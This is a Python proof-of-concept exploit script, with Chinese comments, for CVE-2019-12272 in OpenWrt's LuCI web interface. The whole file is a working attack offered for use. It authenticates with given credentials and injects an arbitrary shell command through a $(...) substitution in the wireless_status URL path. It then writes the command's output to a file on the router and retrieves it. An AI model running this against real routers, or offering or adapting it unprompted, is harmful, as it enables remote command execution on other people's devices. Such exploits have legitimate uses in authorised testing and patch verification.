#!/usr/bin/python3

import argparse
import json
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit(args):
    try:
        address = args.address
        username = args.username
        password = args.password
        command = args.command
    
        session = requests.Session()
        
        url = 'http://%s/cgi-bin/luci/admin/status/realtime/wireless_status/eth0$(%s>output.txt)' % ( address,command ) # 将执行结果写入output.txt文件
        
        data = {'luci_username':username,'luci_password':password}
        response = session.post(url=url,data=data,verify=False)
        
        url = 'http://%s/output.txt' % address # 获取output.txt内容
        response = session.get(url=url,verify=False)
        print('[+] out=\n'+response.text)
    except:
        print('[-] not exploitable')


def main():
    parser = argparse.ArgumentParser(description='cve-2019-12272.py')
    requiredNamed = parser.add_argument_group('required named arguments')
    requiredNamed.add_argument('-a', '--address', help='地址', required=True)
    requiredNamed.add_argument('-u', '--username', help='username', required=True)
    requiredNamed.add_argument('-p', '--password', help='password', required=True)
    requiredNamed.add_argument('-c', '--command', help='待执行命令', required=True)
    args = parser.parse_args()
    exploit(args)

if __name__== "__main__":
    main()